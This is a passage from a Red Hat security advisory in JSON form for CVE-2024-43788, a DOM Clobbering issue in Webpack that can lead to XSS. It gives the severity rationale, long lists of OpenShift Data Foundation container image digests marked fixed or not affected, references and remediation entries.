"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le"
],
"known_not_affected": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-15T08:52:38+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8113"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
